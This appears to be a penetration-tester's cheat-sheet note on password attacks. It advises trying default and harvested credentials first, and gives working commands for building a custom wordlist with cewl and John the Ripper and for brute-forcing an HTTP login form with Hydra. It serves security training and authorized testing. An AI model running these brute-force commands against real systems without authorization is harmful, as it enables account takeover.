Password Attacks

Brute force and Wordlists

Hint

Try default credentials first: ihebski/DefaultCreds-cheat-sheet

If that doesn't work try to obvious ones first (like, root, toor, password or the service name)

If that also doesn't work try already harvested credentials from the environment.

Create a custom wordlist

  1. Scrape the words: cewl --depth 5 --min_word_length 5 --write passwords.txt --ua "curl/7.83.0" --with-numbers -v {URL}
  2. Mutate them: john --wordlist=passwords.txt --rules --stdout > mutated.txt

THC-Hydra

Hint

If you use a long password list, you can prepend timeout 30m hydra... to stop the attack after 30 minutes

Example usage for http forms:

hydra -v -V -u -t 4 -L {USERNAME_LIST} -P {PASSWORD_LIST} {IP} http-post-form "/login.asp:username=^USER^&password=^PASS^&submit=Enter:Login failed!"

Relevant Note(s): Crack the Hashes